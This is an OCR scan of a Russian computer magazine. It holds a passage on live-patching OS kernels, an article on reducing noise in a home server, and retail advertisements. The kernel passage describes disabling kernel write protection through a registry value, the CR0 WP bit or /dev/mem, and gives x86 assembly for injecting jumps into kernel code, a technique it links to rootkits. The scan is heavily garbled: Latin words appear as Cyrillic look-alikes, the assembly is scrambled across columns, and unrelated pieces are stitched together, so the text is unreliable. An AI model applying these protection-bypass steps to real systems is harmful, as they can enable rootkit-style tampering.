ХР и Висты, в которые встроена неотключае- 
мая защита от умышленной модификации под 
названием РаісЬСиагсІ, техника обхода которой 
описана мыщъх'ом в статье «Взлом раІс1і-§иагсІ» 
(Ьцр://пе2иті.оге.ги/ращк-еиагс1-1іаск.2Ір) . 

В ОТ/ѴѴ2К/ХР/Виста-х86 существует два спосо- 
ба отключения защиты от непреднамеренной 
модификации из нулевого кольца: статичес- 
кий и динамический. Статический сводится 
к созданию параметра Еп^огсеѴѴгПеРгоГесгіоп 
типа КЕС_БѴѴОКІ) со значением 0x0 в 
НКЬМ\8У8ТЕМ\Сиггепі:СоШгоІ8еІ:\Соп1:го1\ 
8е55ІопМапа§ег\МетогуМапа§етепі:, а дина- 
мический осуществляется сбросом ѴѴР-бита в 
управляющем регистре СК0, который расшиф- 
ровывается как ѴѴгПе РгоСесгіоп. Повторная 
установка бита включает защиту. 

Аналогичным способом можно отключить и 
защиту ядра в ІЖІХ-подобных системах. Сброс 
ѴѴР-бита действует на аппаратном уровне, 
открывая все ассеззіЫу-станицы для модифи- 
кации независимо оттого, разрешена в них 
запись или нет. Естественно, текущий уровень 
привилегий (СРЬ) не должен превышать СРЬ 
модифицируемой страницы, иначе процессор 
сгенерирует исключения типа «ошибка до- 
ступа» (то есть с прикладного уровня ядро все 
равно остается недоступно) . 

Сброс ѴѴР-бита имеет глобальное воздействие, 
затрагивающее не только ядро, но и приклад- 
ные процессы, поэтому отключать защиту на 
долгое время крайне нежелательно. Некоторые 
программы (особенно протекторы испол- 
няемых файлов и некоторые защиты) явно 
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>В І_іпих и хВ5Э 
существует возмож- 
ность скомпилиро- 
вать монолитное 
ядро без поддержки 
загружаемых моду- 
лей, что благотворно 
сказывается на 
безопасности, но за- 
трудняет наложение 
«горячих» заплаток. 
Однако если псевдо- 
устройство /беѵ/тет 
остается доступным 
(а чаще всего дела 
обстоят именно так), 
мы можем найти 
в памяти таблицу 
системных вызовов 
и внедрить в ядро 
свой собственный 
код, работающий на 
нулевом кольце и 
накладывающий за- 
платку по описанной 
мыщъх'ом методике. 



С \ 




ѵ 

> Пример реализа- 
ции КІ_Э-модуля 
(Оупагпіс Кегпеі 
Ыпкег) для РгееВБЭ, 
отключающего защи- 
ту ядра отзаписи при 
загрузке и включаю- 
щего ее обратно при 
выгрузке, приведен 
в полной версии ста- 
тьи. Ееты сможешь 
найти на прилагае- 
мом к журналу диске. 



закладываются на генерацию исключения, возникающего 
при попытке записи в КеасЮпІу-страницу, и после сброса 
ѴѴР-бита перестают работать. 

Как вариант — можно поиграться низкоуровневыми 
функциями семейства рге_х (например, рге_ткѵѵгі1:е), 
работающими с каталогом страниц. Это более красивый и 
надежный, однако, увы, системно-зависимый путь, поэтому 
на практике приходится идти на компромисс, жертвуя 
надежностью в пользу переносимости. 

Проблема когерентности и пути ее решения 

Итак, теперь мы можем модифицировать ядро, накладывая 
«горячие» заплатки или перехватывая системные функ- 
ции, внедряя в их начало команду перехода на свое тело. 
Большинство руткитов именно так и поступает, забыв о том, 
что подопытный код может исполняться одновременно с 
его модификацией, приводя к краху системы. Причем эта 
«одновременность» довольно относительная. Как известно, 
на однопроцессорных машинах потоки выполняются 
последовательно, а не параллельно, и иллюзия «одновре- 
менности» создается лишь за счет быстрого переключения 
между ними. 

Допустим, поток А был прерван при исполнении функции 
(оо, после чего планировщик передал управление потоку В, 
выполняющему функцию Ъаг. Вопрос: что произойдет, если 
мы модифицируем содержимое ібо? Очевидно, когда поток 
А вновь получит управление, он окажется в совершенно 
другом окружении, возможно, даже пытаясь продолжить 
выполнение с середины новой машинной команды! 

Причем нет никакой возможности узнать, находится этот 
участок кода под выполнением или нет! То есть как это нет? ! 
Очень даже есть — просто просматриваем контексты всех 
потоков (процессов, отложенных функций), при необходи- 
мости дожидаясь момента, когда обозначенный код выйдет 
из-под управления, после чего правим его. Вот и все ! Прос- 
то, элегантно, но, увы, неработоспособно. 

Во-первых, добраться до контекстов процессов/потоков/от- 
ложенных функций в одно мгновение невозможно! Поток, 
анализирующий контексты других потоков, исполняется 
параллельно с ними, и пока мы читаем контекст очередного 
потока, предыдущие уже могли измениться. Теоретически 
возможно «замораживать» все потоки на время модифи- 
кации (предварительно дождавшись, пока они покинут 
пределы модифицируемого кода), а потом «размораживать» 
их обратно, однако этот трюк имеет довольно ограничен- 
ную область применения. В частности, он не работает с 
обработчиками аппаратных прерываний, блокирование 
которых крайне нежелательно или же вовсе недопустимо. 
Во-вторых, все это слишком системно-зависимо, а ковы- 
ряться во внутренних (и зачастую недокументированных) 
структурах оси — тоскливое и бесперспективное дело. 
Существует несколько универсальных решений этой про- 
блемы. Вот, например, одно из них: внедряем в начало моди- 
фицируемой функции командует ОЗЬ, соответствующую 
однобайтовому опкоду ССЬ, и тогда при ее вызове процессор 
будет генерировать отладочное исключение, перехваты- 
ваемое нашим обработчиком, передающим управление на 



пропатченную версию обозначенной функции, располо- 
женную совсем в другом месте. Оригинальная функция 
(за исключением первого байта) остается неизменной, и 
потому мы можем не волноваться за то, что какой-то неожи- 
данно проснувшийся поток продолжит ее выполнение. 
Поскольку выполнение машинных команд — атомарная 
операция, то записывать ЮТ ОЗЬ можно поверх любой 
команды, и это гарантированно не приведет к развалу 
системы, даже если модифицируемая команда исполняется 
в этот момент на другом процессоре! Процессор выполнит 
либо оригинальную команду, либо ЮТ ОЗЬ. Промежуточное 
состояние у него попросту отсутствует. 

Достоинство этого решения в том, что оно не требует 
анализа ассемблерного кода исходной функции. Мы просто 
пишем ЮТ ОЗЬ — и все! Недостатки: а) при модификации 
более чем одной функции обработчик должен анализиро- 
вать адрес исключения, чтобы определить, куда передать 
управление; б) это плохо работает с отладчиками (де-факто 
ЮТ ОЗЬ представляет собой программную точку останова) ; в) 
часто вызываемые функции при такой методике перехвата бу- 
дут заметно тормозить, снижая общую производительность. 
Более сложное, но вместе с тем и более «технологическое» 
решение заключается в записи команды )шр пеаг Иаг§е1: 
поверх машинной команды равной или большей длины, где 
Таг^еТ — адрес модифицируемой функции, которой переда- 
ется управление. 

Проблема атомарности и пути ее решения 

Запись командьцтр пеаг Гаг^еі: должна представлять 
атомарную операцию, выполняемую целиком за один раз. В 
противном случае может сложиться ситуация, при которой 
процессор попытается выполнить «недописанную» команду 
со всеми вытекающими отсюда последствиями, но инструк- 
ция вида тоѵ [тет] , ге§8/16/32 не позволяет записывать 
более четырех байт, а потому совершенно непригодна для 
решения поставленной задачи. 

Некоторые хакеры используют 55Е-инструкции, позволя- 
ющие записывать более четырех байт, и на однопроцессор- 
ных машинах такой трюк работает вполне нормально. Но 
на многопроцессорных системах существует вероятность 
(пускай и ничтожная) модификации кода в процессе его 
выполнения, а префикс блокировки шины (ШСК) перед 
55Е-командами вставлять нельзя. 

К счастью, начиная с первопней, в лексиконе процессоров 
существует замечательная команда СМРХСНС8В, под- 
держивающая префикс «ШСК» и записывающая одним 
махом целых 8 байт! Для внедрения 5 -байтовой инструкции 
)тр пеаг Таг^еИ этого более чем достаточно. Естественно, 
чтобы не затереть оставшиеся 3 байта, сначала мы должны 
прочитать 8 байт из памяти, наложить на них )шр пеаг Тагмет 
и записать полученную смесь обратно. Вот тут некоторые 
спрашивают: зачем это делать, ведь )тр — это безуслов- 
ный переход и находящиеся за ним команды никогда не 
получат управления? А затем, что находящиеся за ним 
команды могли получить управление еще до модификации. 
Примечание: некоторые трансляторы не поддерживают 
инструкцию СМРХСНС8В, и в этом случае ее можно задать 
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>Адресное пространство ЫТ/ѴѴ2К/ХР в конфигурации по умолчанию 



через директиву БВ или_етП в байтовом виде 
ОРЬ С7Ь ОЕЬ. 

Готовый пример реализации внедрения )тр 
пеаг Таг^еТ посредством СМРХСНС8В приведен 
ниже: 

ВНЕДРЕНИЕ ЛИР МЕАКТАКѲЕТ ПО 
СРЕДСТВОМ КОМАНДЫ СМРХСНѲ8В; 

В РЕГИСТРЕ ЕАХ ПЕРЕДАЕТСЯ АДРЕС ЗА- 
ПИСИ ЛИР, А В РЕГИСТРЕ ЕВХ — ТАКѲЕТ 

; сохраняем адрес модифицируемой 

команды 

РІІЗН ЕАХ 

; зІ 2 еоГ(зшр пеаг багдеб) 

АББ ЕАХ, 5 

; вычисление операнда команды ^шр 
пеаг багдеб 
ЗБВ ЕВХ, ЕАХ 

; ЕЗІ — адрес модифицируемой 

команды 

РОР ЕЗІ 

; обнуляем ЕБХ : ЕАХ 
ХОЕ ЕАХ, ЕАХ 
ХОЕ ЕБХ, ЕБХ 
; читаем 8 байт из [ЕЗІ] 

СМРХСНС8В [ЕЗІ] 

; заносим в стек 4 старших прочи- 
танных байта 
РІІЗН ЕБХ 



кируя шину 

ЬОСК СМРХСНС8В [ЕЗІ] 

Советы и рецепты по наложению заплатки 

Чтобы не связываться с ассемблером, доста- 
точно скопировать исправленный вариант 
функции в свой модуль — пусть транслятор 
компилирует, тогда нам останется всего лишь 
передать на нее управление командой )тр пеаг 
Таг^еТ (естественно, вместе с функцией необ- 
ходимо скопировать и все макросы, заданные 
директивой бейпе, а также подключить необхо- 
димые заголовочные файлы) . 

При этом мы наталкивается на следующие про- 
блемы: а) если функция обращается к глобаль- 
ным переменным, то мы должны подставить 
адреса переменных оригинальной функции, 
иначе поведение системы станет непредсказу- 
емым; б) адреса «внутренних» функций ядра, 
вызываемые этой функцией, также необходимо 
подставлять вручную; в) мы не можем прика- 
зать компилятору исключить уже выполненные 
команды, поэтому прежде чем передавать 
управление откомпилированной функции, 
следует выполнить откат, повесив на ]тр пеаг 
іаг^еі промежуточный обработчик, который в 
данном случае будет выглядеть так: 



РОР ЕВР 
РОР ЕЗІ 
РОР ЕБІ 
РОР ЕВР 

Как видно, мы выполняем обратную последо- 
вательность команд, восстанавливая стек и 
содержимое регистров, а при необходимости 
освобождая выделенную функцией память и 
прочие системные ресурсы. 

С ѴѴіпбомгз в этом плане сложнее. Исходных 
текстов нет, и вставить исправленную фун- 
кцию в драйвер не получится. Здесь есть два 
пути: дизассемблировать ядро и переписать 
код на Си (трудоемко, зато надежно) или же 
скопировать функцию прямо в двоичном виде, 
корректируя ссылки на функции, вызываемые 
по относительным адресам. Поскольку адрес 
загрузки драйвера наперед неизвестен, коррек- 
цию приходится осуществлять налету. Заносим 
адреса машинных команд саіі Наглее/] тр Гаг^еГ 
в специальный массив, хранящийся в драйвере, 
а в процедуре инициализации обрабатываем 
все элементы, добавляя к непосредственному 
операнду базовый адрес загрузки, не забыв 
предварительно отключить защиту от записи, 
поскольку по умолчанию кодовая секция 
доступна только на чтение. 

Заключение 

Заштопать ядро операционной системы без пе- 
резагрузки — очень сложно, но вполне реально. 
Конечно, далеко не всякому администратору 
это по силам, однако фирмы, занимающиеся 
поддержкой, могут выпускать неофициальные 
«горячие» заплатки, расхватываемые, словно 
пирожки! Ведь это не просто актуальная, а 
суперактуальная тема, в которой заинтересо- 
ваны миллионы пользователей, так что на счет 
спроса можно не сомневаться. . ЕЕ 



; оставляем из них 3 
ІЫС ЕЗР 

; накладываем операнд команды зшр 
пеаг багдеб 
РІІЗН ЕВХ 

; накладываем опкод команды ;ітр 
пеаг багдеб 
РІІЗН 0Е9000000І1 
; удаляем 3 нуля 
АББ ЕЗР , 3 

; подготавливаем регистры к вы- 
полнению СМРХСНС8В 
РОР ЕВХ 
РОР ЕСХ 

; записываем 8 байт в [ЕЗІ] , бло- 
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Бесшумный сервер 

своими РУКАМИ 



РЕШАЕМ ПРОБЛЕМУ СНИЖЕНИЯ ШУМА НА ДОМАШНЕМ СЕРВЕРЕ 

Развитие локальных сетей привело к росту популярности домашних серверов, многие из которых из-за 
хронического недостатка жилищного пространства приходится устанавливать прямо в местах обитания 
их владельцев, что неизбежно сталкивает их с шумовой проблемой. На сегодняшний день существует 
множество методик борьбы с шумом, но далеко не все они эффективны. 



Введение, или что там грохочет внутри 

Прежде чем бороться с шумом, нужно выявить 
его основные источники, перечисленные ниже 
в порядке убывания своей активности. Естест- 
венно, этот порядок весьма условен и зависит 
от множества обстоятельств, с которыми мы 
разберемся чуть позже, а сейчас просто соста- 
вим приблизительный список, чтобы очертить 
фронт работ: 

• жесткие диски; 

• вентилятор на процессорном радиаторе; 

• вентиляторы на видеокарте, чипсете и т.д.; 

• вентилятор на блоке питания и прочие венти- 
ляторы внутри корпуса ПК. 

Жесткие диски 

С переходом на гидродинамические подшип- 
ники (Ріиісі Оупатіс Веагіп§ — РЭВ) жесткие 
диски перестали быть самым шумным ком- 
понентом ПК, и единственным грохочущим 
элементом осталась сервосистема (она же сис- 
тема позиционирования магнитной головки) . 
Но производители активно работают в этом 
направлении, и большинство современных 
винчестеров предусматривает несколько ре- 
жимов работы: от тормозного, но бесшумного 



до грохочущего, но высокопроизводительного. 
По умолчанию обычно выбирается промежу- 
точный компромиссный вариант, который 
легко изменить, скачав с сайта производителя 
специальную утилиту (у всех производителей 
она разная). 

Несколько дисков, установленных в одну 
стойку, могут входить в резонанс, излучая 
целый спектр звуков всех частот. Обычно это 
низкочастотный гул, реже — инфразвуковые 
колебания, не воспринимаемые человеческим 
ухом, но вызывающие быструю утомляемость, 
чувство тревоги и прочий дискомфорт. В 
нормальной стойке должны использовать- 
ся резиновые прокладки, не допускающие 
прямого контакта стойки с корпусом жесткого 
диска. Некоторые производители используют 
пружинные или резиновые растяжки, что 
уменьшает шум и гарантированно предотвра- 
щает резонанс, но вместе с этим и сокращает 
срок службы жесткого диска, рассчитанного на 
жесткий монтаж, а не на «болтанку». 

Как вариант — можно установить один 
жесткий диск в трехдюймовый отсек, а другой 
— в пятидюймовый, но при этом возникает 
проблема с охлаждением, а жесткие диски, 



работающие в круглосуточном режиме, настоя- 
тельно рекомендуется охлаждать. Естественно, 
чем больше вентиляторов — тем больше шума. 
Поэтому закрепляем винчестеры в одной 
стойке, обдуваемой большим тихоходным 
вентилятором с кривыми (а не рубленными) 
лопастями, нагнетающими воздух внутрь 
корпуса ПК. Естественно, на лицевой стенке 
должна быть предусмотрена решетка, а если ее 
нет, то для возможности подсоса воздуха венти- 
лятор следует отодвинуть от корпуса хотя бы на 
3-5 см. Подшипники скольжения (состоящие 
из простой втулки) работают намного тише 
шарикоподшипников, хотя имеют намного 
меньший ресурс. Постепенно втулка дефор- 
мируется, и вентилятор начинает тарахтеть, 
как гусеничный экскаватор. Смазка подшип- 
ника веретенным маслом на некоторое время 
решает проблему, но прилипающая к ней пыль 
служит хорошим абразивом, в результате чего 
износ резко возрастает, и вентилятор начинает 
тарахтеть вновь, требуя замены. 

Кстати говоря, известно несколько случаев, 
когда принудительное охлаждение жестких 
дисков не только не увеличивало срок их 
службы, но и приводило к довольно быстрым 
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> Ваггасисіа отБеадаіе — не только тихая, но еще и > Пассивный радиатор от2аІтап 

самая надежная модель из всех 



отказам. Все просто! От неравномерного 
охлаждения корпус винчестера чуть-чуть 
ведет (имеет место тепловое расширение), что 
вызывает перекос некоторых узлов со всеми 
вытекающими отсюда последствиями. 

Процессор 

Начиная с процессоров 80486, на радиаторах 
стали появляться вентиляторы, а на Репгіит'ах 
это явление приобрело массовый характер. 
Современные процессоры выделяют огромное 
количество тепла, для эффективного отвода 
которого используются высокоскоростные 
вентиляторы, прокачивающие множест- 
во кубических сантиметров воздуха, что, 
естественно, сопровождается шумом. Но ведь 
домашнему серверу не требуется мощный 
процессор! Самый радикальный метод борьбы 
с шумом — перевести процессор на пассивное 
охлаждение, то есть убрать вентилятор. 

В свое время фирма Сугіх выпустила несколько 
удачных процессоров, в спецификации кото- 
рых пассивное охлаждение декларировалось 
явно. И хотя они не могли похвастаться особой 
производительностью, для нормальной работы 
офисных приложений их вполне хватало. Но 
конкурировать с ІШеІ/АГѵГО фирме Сугіх ока- 
залось не по силам, и она продала свой бизнес 
компании ѴІА (ѵѵѵѵѵ\/.ѵіа.сот.ілл//еп/ргобисЩ/ 
ргосеззогз) . А та слегка пересмотрела специ- 
фикации и прикрутила активное охлаждение, 
которое процессорам семейства СЗ (другие 
мыщъх не тестировал) совершенно ни к чему. 

В жарком климате местообитания мыщьх'а (до 
42 °С) на массивном медном радиаторе темпе- 
ратура процессора, работающего под управле- 
нием ѴѴіпсІоѵѵз 2000, никогда не превышала 55 °С, 
оставляя достаточный запас прочности. 

То же самое относится и к Репгіит-ІІІ 733 МНг 
(Соррегтіпе). Правда более быстрые модели 
уже приходится тормозить, уменьшая такто- 
вую частоту и напряжение питания. Снижать 
питающее напряжение без уменьшения 
тактовой частоты нельзя, поскольку чем ниже 
разность потенциалов, тем медленнее выпол- 
няются переходные процессы, и электронные 
ключи просто не успевают переключиться за 
отведенный им такт. 



В крайнем случае (если температура кристалла 
все-таки приближается к опасному уровню) 
можно поблизости от радиатора закрепить ти- 
хоходный вентилятор с большими лопастями. 
Авотводяное охлаждение использовать не рекомен- 
дуется. И не только потому, что существуетугроза 
утечки охлаждающей жидкости (как правило, 
воды), ведущей котказу электроники, авнекоторых 
случаях даже к локальным возгораниям и пожарам. 
Помпа далеко не бесшумна, ктомуже достаточно 
часто выходит из строя, что опять-таки приводит к 
перегреву и выходу сервера из рабочего состояния. 
2а1тап имеет в своем ассортименте несколько 
моделей пассивных радиаторов, пригодных 
даже для охлаждения РепНіит 4 и основанных 
на кипении жидкости в герметично запаянных 
трубочках. Однако их стоимость довольно 
велика, да и смысла строить домашний сервер 
на базе Решит 4 нет никакого. Лучше исполь- 
зовать технику, оставшуюся после апгрейда 
своей основной системы. 

Северный мост, видеокарта 
и все-все-все остальные 

Материнская плата с активным охлаждением 
северного моста (равно как и видеокарта с за- 
крепленным на ней вентилятором) — это ужас 
(только не тихий, а весьма громкий), и потому 
она идет лесом. Северный мост, конечно, очень 
горячее место, но все же не настолько, чтобы к 
нему прикреплять вентилятор. А видеокарта 
серверу и вовсе не нужна (по крайней мере, ЗЭ- 
устроитель — это явное излишество) . 

Авот от интегрированного видео лучше все-таки 
воздержаться. Даже при выключенном мониторе 
такая видюха продолжает работать, грея северный 
мост (который и без того перегружен) и завешивая 
его в жаркую погоду при загрузке ѴѴіпбоѵѵз. Про- 
блема решаетсялибо установкой более мощного 
радиатора (зачастую с активным охлаждением), 
либо выключением интегрированного видео в 
ВІОЗ'е и переходом на нормальную карту. 

Блокпитания 

Родные вентиляторы блоков питания обычно 
производят достаточно много шума, имеют 
рубленые лопасти и высокие обороты. Ладно, 
покупаем блок питания с запасом по мощ- 



ности, устанавливаем в него вентилятор с 
выгнутыми аэродинамическими лопастями 
и снижаем обороты до минимума (о том, 
как это сделать, рассказывается во врезке) . 
Вентилятор, нагнетающий воздух внутрь блока 
питания, охлаждает его намного эффективнее, 
чем родной вентилятор, придерживающийся 
АТХ-спецификации и работающий на выдув. 
Правда, при этом возникает следующая пробле- 
ма. При нагнетании воздуха в корпус сразу с двух 
сторон (со стороны блока питания и стойки с 
жесткими дисками) внутри возникает повышен- 
ное давление, снижающее эффективность систе- 
мы охлаждения. Можно, конечно, поставить 
третий вентилятор, работающий на выдув, но 
к чему нам лишний шум? Проще установить 
перегородку между дном блока питания и 
материнской платой, доходящую до пятидюймо- 
вого отсека со снятой декоративной крышкой, 
которую можно заменить решеткой (а можно 
и не заменять) . Таким образом, мы отделяем 
воздушные потоки друг от друга, не давая им 
смешиваться. Воздух, нагнетаемый внутрь бло- 
ка питания, проходит по верху корпуса, выходя 
через пятидюймовый отсек, а воздух, охлаждаю- 
щий винчестеры, выходит через щели в боковых 
стенках корпуса. И все остаются довольны. 

Еще одно обстоятельство. Импульсные блоки 
питания (а других сейчас нет) могут генериро- 
вать высокочастотные колебания (писк, свист), 
которые лежат за пределами восприятия уха 
взрослого (музыкантов и меломанов в расчет 
не берем), но отчетливо воспринимаются 
детьми. Так что если твой ребенок жалуется на 
сервер, утверждая, что слышит звуки, которые 
не слышишь ты, вместо того чтобы вести его к 
психиатру, просто замени блок питания. То же 
самое относится и к дросселям, установленным 
на материнской плате. Длительное воздействие 
высокочастотных колебаний отрицательно 
сказывается как на психике (особенно, еще не 
окрепшей), таки на всем здоровье в целом, поэ- 
тому отмахиваться от этой проблемы не стоит. 

Корпус 

Китайские корпуса, собранные из тонкого 
металла на заклепках (половина из которых не 
затянута) , дребезжат всеми своими частями, 
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>Температура Репііит III 733, установленного внутри мыщъх’иного 
сервера на медный радиатор с пассивным охлаждением 




> ѴІА СЗ (бывший Сугіх СЗ Еіга) — один из немногих процессоров, 
способных работать с пассивным охлаждением 



усиливая вибрации жестких дисков и венти- 
ляторов. Чем толще металл, тем тише корпус, 
особенно если высверлить заклепки, заменив 
их гайками с болтами. Жестяные декоративные 
заглушки, удерживаемые одними силами тре- 
ния, лучше посадить на двухсторонний скотч, 
лишив их возможности издавать мерзкие звуки 
раз и навсегда. 

Боковые стенки также лучше посадить на 
болты, не давая им возможности болтаться, а 
сам корпус оклеить изнутри гофрированным 
картоном (оставляя открытыми лишь вентиля- 
ционные отверстия), или другим шумопогло- 
щающим материалом, который можно приоб- 
рести, например, в автомагазине. Конечно, это 
существенно снизит теплоотдачу, увеличивая 
температуру внутри корпуса, но для больших 
корпусов это не проблема. Избыток свобод- 
ного пространства не позволяет температуре 
приближаться к опасной отметке. Впрочем, все 
решает эксперимент. Современные материнс- 
кие платы снабжены как минимум одним или 
двумя термодатчиками, позволяющими вести 
круглосуточный мониторинг. 



Некоторые предпочитают оборачивать корпус 
пенопластом снаружи, но это плохая идея, 
поскольку при оклеивании корпуса гофриро- 
ванным картоном изнутри мы гасим звуко- 
вые волны до того, как они дойдут до стенок, 
резонирующих в такт с шумом и многократно 
усиливающих его уровень, от которого не 
спасает даже расположенный сверху пеноп- 
ласт. Впрочем, учитывая, что часть источни- 
ков шума прикручена к корпусу и передает 
колебания непосредственно через металл, 
минуя воздушную среду (и наш картон), допол- 
нительный уровень защиты в виде пенопласта 
отнюдь не помешает. Главное — помнить про 
вентиляционные отверстия, отступая от них 
хотя бы на несколько сантиметров, поскольку 
через узкую пенопластовую «шахту», вырезан- 
ную по размеру отверстий, воздух циркулирует 
с большой неохотой. 

Не стоит забывать и про деревянные кор- 
пуса (между прочим, очень даже модные в 
последние время). Они великолепно гасят 
шумы, однако требуют установки несколь- 
ких вентиляторов для эффективной цир- 



куляции воздуха, особенно если процессор 
переведен на пассивное охлаждение. Весь 
фокус в том, что дополнительные венти- 
ляторы (естественно, низкооборотистые) 
следует размещать в глубине корпуса, тогда 
наружу вместо шума вырвется лишь слабый 
шелест. 

Заключение 

Проблемой снижения шума мыщъх впер- 
вые озаботился при переходе с Репгіит II на 
РепНіит III. Посадив кристалл на крутой (по тем 
временам) радиатор СоЫеп ОгЪ, мыщъх был 
буквально ошеломлен, но не скоростью рабо- 
ты, а громкостью шума и вибрацией корпуса. 
Смутно представляя себе возможность твор- 
ческой работы в таких условиях, мыщъх начал 
экспериментировать с радиаторами разных 
фирм и, увидев сіаіазііееі: на процессор Сугіх СЗ 
Егга, сразу же проникся к нему любовью. 

Вот так, снижая шумность компонентов одного 
за другим, мыщъх добился того, что компьютер 
(даже с открытой крышкой) перестал быть 
слышен вообще ! ПС 



КАКЗАТОРМОЗИТЬ ВЕНТИЛЯТОР 

Зависимость уровня шума от частоты оборотов очень сложная (и 
к тому же связана с конструктивными особенностями конкретной 
модели вентилятора), но из самых общих соображений понятно: чем 
ниже обороты, тем меньшее сопротивление оказывает воздушный 
поток, ниже биения несбалансированной крыльчатки и т.д. При 
частоте порядка 1000 оборотов в минуту большинство вентилято- 
ров практически не шумит, но уже при 2000 — 3000 оборотов шум 
становится буквально невыносимым, что неудивительно, поскольку 
объем перекачиваемого воздуха пропорционален частоте оборотов, 
а шум — частоте в пятой степени. Следовательно, частоту оборотов 
нужно снижать. А как? 

Большинство современных материнских плат снабжено функцией 
5таіТ Рап Сопігоі, позволяющей изменять частоту вращения венти- 
лятора в зависимости от температуры специального датчика. Некото- 
рые платы (как, например, Ерос) имеют внешний датчик (Іегтозгіск) 
и свободное гнездо ЗтаП: Рап Сопігоі, в которое можно подключить 
вентилятор от блока питания. 



Если же такого гнезда нет, можно воткнуть резистор номиналом 
30-100 Ом (нужная величина подбирается экспериментально) 
в цепь питания вентилятора (красный провод, расположенный 
посередине разъема) . При этом следует учитывать, что при пуске 
вентилятор требует больше тока, чем при работе, и потому, если 
переборщить с сопротивлением, вентилятор может попросту 
не запуститься! Поэтому для страховки параллельно резистору 
следует подключить приклеенный к процессору термистор с 
обратной характеристикой. Холодный термистор имеет небольшое 
сопротивление, и потому вентилятор запускается на ура. Затем, по 
мере нагрева процессора, сопротивление термистора возрастет до 
нескольких килоом и он уже не оказывает на резистор практически 
никого шунтирующего воздействия. Правда при кратковремен- 
ном выключении компьютера (когда радиатор процессора еще не 
успел остыть) сопротивление термистора по-прежнему велико и 
вентилятор имеет шанс не запуститься. Однако для серверов эта 
проблема неактуальна, поскольку их выключают редко, а от брос- 
ков по питанию защищает ИР5. 
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ѵѵѵѵѵѵ.Ід.ги 




Высокий уровень контрастности достигается за счет 
новейшей технологии Оідііа I Ріпе Сопігаз'і 





2000:1 

0іді1:аІ 

Ріпе 

Сопігазі: 



Во Власти Качества 

Высокий контраст 

ЖК - монитор І_С РЬАТРЮЫ І_1960Т<3 

іпаѴісІюгіа 

(495) 681-20-70, ѵѵѵѵѵѵ.сіѵсотр.ги 




МОСКВА: Ргопеі Сгоир (495) 789-38-46, Неоюрг (495) 223-23-23, розничная сеть Роіаіѣ (495) 363-93-33, Ф-Центр (495) 472-64-01, 
ІЧТ Сотриіегз (495) 363-93-33, Техносила (495 ) 777-87-77, Компания Кит (495) 777-66-55, РІаке (495) 236-99-25, АБ-групп (495) 745-51-75, 
Сетевая Лаборатория (495) 784-64-90, І5М (495) 718-40-20, Никс (495) 974-33-33, ОЛДИ (495) 105-07-00, ІІ5Ы СотріЛегз (495) 221-72-97, 
Старт-Мастер (495) 935-38-52, Акситек (495) 784-72-24, Эльдорадо (495) 500-00-00, Кибертроника (495) 504-25-31, 
Дилайн (495) 969-22-22, Шга СоплриРегз (495) 775-75-66, Алмер (495) 101-39-25, Микросет (495 ) 924-27-47, Гипермаркет Санрайз Про 
(495) 542-80-70, ДЕЛ (495) 250-44-66, Ланит (495) 967-66-84, 000 Вега (495) 784-72-35, ГЕЛИОС КОМПЬЮТЕР 

(495) 785-03-76, Бит и Байт (495) 788-37-57. САНКТ-ПЕТЕРБУРГ: ДВМ-Нева (812) 325-11-05. НИЖНЕВАРТОВСК: Ланкорд (3466) 61-22-22. 
ПЕРМЬ: Гаском (342) 237-19-33. НИЖНИЙ НОВГОРОД: АйТиОн (8312) 63-01-53. ТЮМЕНЬ: Инэкс-Техника (3452) 39-00-36, Торговый дом 
"Весы" (3452) 75-00-00. КРАСНОДАР: Иманго-Краснодар (861) 255-15-52. НОВОСИБИРСК: Квеста (383) 333-24-07, 

Арсиситек (383) 221-16-89, НЭТА (383) 218-22-18. БАРНАУЛ: Компьютер Трейд (3852) 66-69-00. ЭЛЕКТРОСТАЛЬ: 

Домотехника (257) 21488. ИРКУТСК: Комтек (3952) 25-83-38, Билайн (3952) 24-00-24. КРАСНОЯРСК: Альдо (3912) 21-11-45, Старком 
(3912) 62-33-99, Аверс (3912) 56-05-61. ЛИПЕЦК: Регард Тур (0742 ) 48-45-73. ВОРОНЕЖ: Сани (0732 ) 54-00-00, Рет (0732) 77-93-39. 
ТОМСК: Стек (3822) 55-71-43. РЯЗАНЬ: ДВК (0912) 90-00-00. ЯРОСЛАВЛЬ: Фронтекс (4852) 72-38-49. ОМСК: Технопарк (3812) 57-93-19, 
Лик-2000 (3812) 22-97-00. АЛЬМЕТЬЕВСК: Компьютерный мир (8553) 25-98-48. ВОРОНЕЖ: РИАН (4732) 51-24-12. 

ЛАБЫТНАНГИ: КЦ Ямал (34992) 51-777. ИЖЕВСК: ЭЛМИ (3412) 50-50-50, Корпорация «Центр» (3412) 43 88 08. 

СЫЗРАНЬ: ООО "фирма Такт" (8464) 98-34-34. ЕКАТЕРЕНБУРГ: Трилайн (343) 378-70-70. БЛАГОВЕЩЕНСК: А-Эл-Джи Софт 
(4162) 31-70-14. КИРОВ: Портал (8332) 38-20-60. ТАГАНРОГ: Иманго (8634) 315-628. ГОМЕЛЬ: Компьютер Маркет +375 (232) 48-10-48. 




реклама 







Сотриіегз 




Четыре ядра. 

Вне конкуренции. 



Ты учишься или учился - «ЗАЧОТ»! 

Купи наш ПК - мы пополним твой счет!* 



* Купите ПК ІІБЫ на базе 
четырехъядерного процессора 
Іпіеі® Соге™ 2 ОиасІ, покажите менеджеру 
дневник, аттестат или диплом 
и на счет вашего мобильного телефона 
будет зачислено 500 рублей 
(посредством карт экспресс-оплаты). 



Прими участие в уникальном шоу! 



30 июня 2007 г. 

в тк Торбушкин двор, 



на 2 этаже. 




ись с Чемпионами Мира по 

тіег бігіке Ѵігіив РКО. 



Подарки 



всем участникам и гостям! 



м. Шоссе Энтузиастов 

ТЦ «Буденовский» 

павильоны: К-3, Д-18 
Тел.: (495) 788-1512 



м. Багратионовская 

ТЦ «Г орбушкин двор» 

павильон Е2-12 
Тел.: (495) 730-2958 



м. Шаболовская 
М. Калужский пер., 
д. 15, стр. 16 
Тел.: (495) 775-8202 



ВКЦ «Савеловский» 

павильоны: С-14, Б-36 
Тел.: (495) 784-7250 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо 1_одо, Соге Іпзісіе, ІпіеІ, Іпіеі І_одо, ІпіеІ Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_одо, Іпіеі Ѵііѵ, Іпіеі ѵРго, Иапіит, Ііапіит Іпзісіе, Репйит, Репйит Іпзісіе, Хеоп, 
и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпіеІ на территории США и других стран. 



На правах рекламы. Товар сертифицирован. 
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